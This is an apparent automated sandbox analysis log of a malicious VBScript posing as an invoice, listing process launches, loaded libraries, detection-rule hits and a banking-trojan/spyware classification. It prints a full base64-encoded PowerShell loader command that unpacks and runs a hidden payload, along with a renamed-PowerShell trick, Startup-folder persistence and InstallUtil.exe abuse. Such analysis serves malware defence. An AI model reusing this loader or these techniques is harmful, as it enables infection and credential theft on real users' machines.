Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe.4.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2244
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2232
Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine Classification label: mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\c9d5959dd5627383
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000033F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Fattura-24SC-99245969925904728562.vbs ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe File read: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc 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
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUA
bgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc 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
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc 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
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll
Source: C:\Windows\System32\wscript.exe Section loaded: starttiledata.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wlidprov.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: provsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\System32\wscript.exe Section loaded: acppage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: aepic.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: atl.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: msisip.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: wshext.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: appxsip.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: opcservices.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: napinsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wshbth.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: shacct.dll
Source: C:\Windows\System32\wscript.exe Section loaded: idstore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: samlib.dll
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: starttiledata.dll
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll
